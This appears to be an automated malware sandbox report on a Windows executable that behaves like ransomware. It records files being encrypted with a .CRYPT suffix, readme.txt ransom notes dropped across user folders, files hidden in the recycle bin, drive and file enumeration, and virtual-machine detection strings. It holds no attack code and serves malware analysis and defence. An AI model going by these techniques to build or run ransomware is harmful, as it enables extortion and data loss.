Source: bkscEXd86b.exe | Static PE information: real checksum: 0x143c77 should be: 0x14dd80
Source: C:\Users\user\Desktop\bkscEXd86b.exe | Code function: 0_2_00C7087D push ecx; ret 0_2_00C70890
Source: initial sample | Static PE information: section name: .text entropy: 7.0691412793
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\eventpage_bin_prod.js.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\craw_window.html.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\background_script.js.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\feedback_script.js.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\material_css_min.css.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\mirroring_cast_streaming.js.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\mirroring_common.js.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\mirroring_hangouts.js.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\mirroring_webrtc.js.CRYPTJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\DOCUMENTS AND SETTINGS\ALL USERS\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\DESKTOP\readme.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\DOCUMENTS AND SETTINGS\DEFAULT\DESKTOP\readme.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\MICROSOFT\PLAYREADY\INTERNET EXPLORER\DESKTOP\readme.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\MICROSOFT\PLAYREADY\INTERNET EXPLORER\INPRIVATE\DESKTOP\readme.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\readme.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\AC\readme.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\AC\INETCACHE\readme.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\AC\TEMP\readme.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\APPDATA\readme.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\LOCALCACHE\readme.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\LOCALSTATE\readme.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\ROAMINGSTATE\readme.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\SETTINGS\readme.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\SYSTEMAPPDATA\readme.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\TEMPSTATE\readme.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\AC\INETCOOKIES\readme.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\AC\INETHISTORY\readme.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCALLOW\ADOBE\ACROBAT\DC\READER\DESKTOPNOTIFICATION\readme.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCALLOW\ADOBE\ACROBAT\DC\READER\DESKTOPNOTIFICATION\NOTIFICATIONSDB\readme.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\readme.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\BNAGMGSPLO\readme.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\EOWRVPQCCS\readme.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\GAOBCVIQIJ\readme.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\KLIZUSIQEN\readme.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\PALRGUCVEH\readme.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\QCFWYSKMHA\readme.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\QCOILOQIKC\readme.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\QNCYCDFIJJ\readme.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\SQSJKEBWDT\readme.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\desktop.ini.CRYPT
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu Places\desktop.ini.CRYPT
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessibility\Desktop.ini.CRYPT
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\desktop.ini.CRYPT
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\desktop.ini.CRYPT
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Maintenance\Desktop.ini.CRYPT
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\StartUp\desktop.ini.CRYPT
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\System Tools\Desktop.ini.CRYPT
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\System Tools\desktop.ini.CRYPT
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Administrative Tools\desktop.ini.CRYPT
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Microsoft Office 2016 Tools\desktop.ini.CRYPT
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\Documents and Settings\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini.CRYPT
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\Documents and Settings\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini.CRYPT
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\Documents and Settings\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini.CRYPT
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\Documents and Settings\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini.CRYPT
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\Documents and Settings\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini.CRYPT
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\Documents and Settings\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini.CRYPT
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini.CRYPT
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini.CRYPT
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini.CRYPT
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini.CRYPT
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini.CRYPT
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini.CRYPT
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.CRYPT
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini.CRYPT
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini.CRYPT
Source: C:\Users\user\Desktop\bkscEXd86b.exe Code function: 0_2_00B92130 StartServiceCtrlDispatcherA,0_2_00B92130

Hooking and other Techniques for Hiding and Protection:

Creates files in the recycle bin to hide itself
Source: C:\Users\user\Desktop\bkscEXd86b.exe File created: C:\$Recycle.Bin\S-1-5-18\desktop.ini.CRYPT
Source: C:\Windows\explorer.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1DBD04D0000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1DBD0800000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1DBD05D0000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1DBD0B80000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1DBD14B0000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1DBD16D0000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1DBD1810000 memory commit | memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 15F35200000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 15F35300000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 15F35400000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 15F356B0000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 15F37000000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 15F37400000 memory reserve | memory write watch
Source: C:\Windows\explorer.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\bkscEXd86b.exe Code function: 0_2_00BA3880 rdtsc 0_2_00BA3880
Source: C:\Windows\System32\conhost.exe TID: 6656 Thread sleep count: 47 > 30
Source: C:\Users\user\Desktop\bkscEXd86b.exe Code function: 0_2_00C69E5A __getdrive,FindFirstFileA,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,0_2_00C69E5A
Source: C:\Users\user\Desktop\bkscEXd86b.exe Code function: 0_2_00B91640 _memset,_memset,_sprintf,FindFirstFileA,_strrchr,_memset,_strncpy,_memset,_sprintf,_memset,_memset,_memset,_memset,_sprintf,FindNextFileA,FindClose,0_2_00B91640
Source: C:\Users\user\Desktop\bkscEXd86b.exe Code function: 0_2_00B91D10 SetServiceStatus,_calloc,_calloc,_sprintf,_memset,_getenv,GetLogicalDrives,_memset,GetLogicalDriveStringsA,_sprintf,GetDriveTypeA,GetDriveTypeA,GetDriveTypeA,_sprintf,_printf,SetServiceStatus,0_2_00B91D10
Source: explorer.exe, 00000007.00000003.310585098.00000000084EA000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: SearchUI.exe, 00000010.00000002.388454921.000001D3D0165000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000004.00000000.244442266.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000004.00000000.241740682.0000000008220000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.384082578.000001D3CFC00000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: SearchUI.exe, 00000010.00000002.392411511.000001DBD0B40000.00000004.00000001.sdmp Binary or memory string: visioitunesvmwarelynconenoteneroexceloutlook.ts.psd.ai&#xEF87.dwgx86amd64LDICobjdobjTOPPFEHbinLRA.vssx.vstxPTMPVD.iniMMUS:wux:.resxMFOL.config.bakIFF.etlIBA.bin.objFL.pdbLM.dllotstotetftutdtrtpto
Source: explorer.exe, 00000007.00000003.335462967.000000000D09F000.00000004.00000001.sdmp Binary or memory string: _VMware_SATA
Source: explorer.exe, 00000007.00000003.309158574.0000000008741000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000004.00000000.232968132.00000000055D0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000004.00000000.244442266.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000004.00000000.244692343.00000000087D1000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000004.00000000.241740682.0000000008220000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.384082578.000001D3CFC00000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: explorer.exe, 00000007.00000003.304293863.00000000086A4000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000!]
Source: SearchUI.exe, 00000010.00000002.389452659.000001D3D01E4000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW(( H
Source: explorer.exe, 00000007.00000003.304293863.00000000086A4000.00000004.00000001.sdmp Binary or memory string: NECVMWarVMware SATA CD001.00
Source: explorer.exe, 00000004.00000000.241740682.0000000008220000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.384082578.000001D3CFC00000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000007.00000003.304293863.00000000086A4000.00000004.00000001.sdmp Binary or memory string: NECVMWarVMware SATA CD001.00BN
Source: explorer.exe, 00000007.00000003.303770661.0000000008707000.00000004.00000001.sdmpBinary or memory string: k\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000003.361935461.000000000D202000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&
Source: explorer.exe, 00000004.00000000.233003562.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000007.00000003.395167657.000000000D07F000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}:
Source: explorer.exe, 00000007.00000003.310457564.00000000087A8000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}FL.
Source: explorer.exe, 00000007.00000003.395167657.000000000D07F000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b};
Source: explorer.exe, 00000007.00000003.394797344.000000000D138000.00000004.00000001.sdmpBinary or memory string: dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
